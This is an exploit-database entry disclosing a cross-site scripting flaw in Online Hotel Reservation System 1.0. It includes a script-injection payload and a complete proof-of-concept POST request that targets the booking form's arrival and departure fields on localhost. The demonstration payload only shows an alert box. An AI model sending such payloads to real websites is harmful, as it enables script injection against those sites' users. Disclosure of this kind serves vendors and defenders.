Exploit for Online Hotel Reservation System 1.0 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:163718
# Exploit Title: Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)  
# Date: 2021-08-02  
# Exploit Author: Mohammad Koochaki  
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/marimar.zip  
# Version: 1.0  
# Tested-on: Ubuntu 20.04.2 LTS, PHP 7.4.3  
  
### This application is prone to a cross-site scripting in the 'arrival' and 'departure' parameters at the following path:  
- http://localhost/marimar/index.php?p=booking  
  
### Payload: "></div><script>alert("XSS-MSG")</script>  
  
### PoC:  
  
POST /marimar/index.php?p=booking HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101  
Firefox/78.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 71  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/marimar/index.php?p=booking  
Cookie: PHPSESSID=9ck943m19rugu8d7q7d6mh6fnt  
Upgrade-Insecure-Requests: 1  
DNT: 1  
Sec-GPC: 1  
  
arrival="></div><script>alert("arrival")</script>&departure="></div><script>alert("departure")</script>&person=0&accomodation=0